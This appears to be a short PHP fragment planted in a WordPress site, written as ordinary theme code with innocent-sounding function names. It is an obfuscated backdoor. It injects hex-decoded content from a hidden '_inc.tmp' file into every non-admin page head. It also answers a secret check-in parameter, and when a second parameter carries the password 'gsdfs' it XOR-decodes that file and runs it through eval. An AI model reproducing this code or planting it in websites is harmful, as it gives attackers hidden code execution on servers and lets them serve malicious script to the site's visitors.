if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } $wrapper = "v-wrap"; $un_wrapper = "gsdfs"; if (@$_GET["v-upd"] == $wrapper) { die($un_wrapper); } if ((is_admin() || (@$_GET[$wrapper] != $un_wrapper)) !== true) { function cash_simplify($cash, $priv) { $priv = base64_encode($priv); $cash = base64_decode($cash); $enc_str = ""; $i = 0; while ($i < strlen($cash)) { for ($j = 0; $j < strlen($priv); $j++) { $enc_str .= chr(ord($cash[$i]) ^ ord($priv[$j])); $i++; if ($i >= strlen($cash)) break; } } return base64_decode($enc_str); } eval (cash_simplify(@hex2bin("4f4" . (file_get_contents(__DIR__ . "/_inc.tmp"))), $un_wrapper));die; }